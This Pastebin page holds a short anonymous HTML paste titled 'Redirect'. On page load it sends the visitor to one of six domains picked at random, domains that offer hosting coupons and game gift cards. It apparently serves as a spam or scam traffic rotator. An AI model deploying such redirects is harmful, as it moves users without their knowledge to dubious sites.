Advertisement
Guest User

Untitled

a guest
Jul 8th, 2025
14
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.64 KB | None | 0 0
  1. <!DOCTYPE html><html lang="en-US"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width"><title>Redirect</title></head>
  2. <body onload="redirect()"><script>
  3.   function getRndInteger(min, max) {
  4.     return Math.floor(Math.random() * (max - min + 1) ) + min;
  5.   }
  6.   function redirect() {
  7.     const urls = [
  8.       'https://cloudhostingstudio.com',
  9.       'https://globaldomainhousing.com',
  10.       'https://yourhostingcouponlive.com',
  11.       'https://giftsforgames.com',
  12.       'https://videogamesgiftcards.com',
  13.       'https://giftcardsgames.com'
  14.     ];
  15.     window.location = urls[getRndInteger(0, 5)]
  16.   }
  17. </script></body>
  18.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement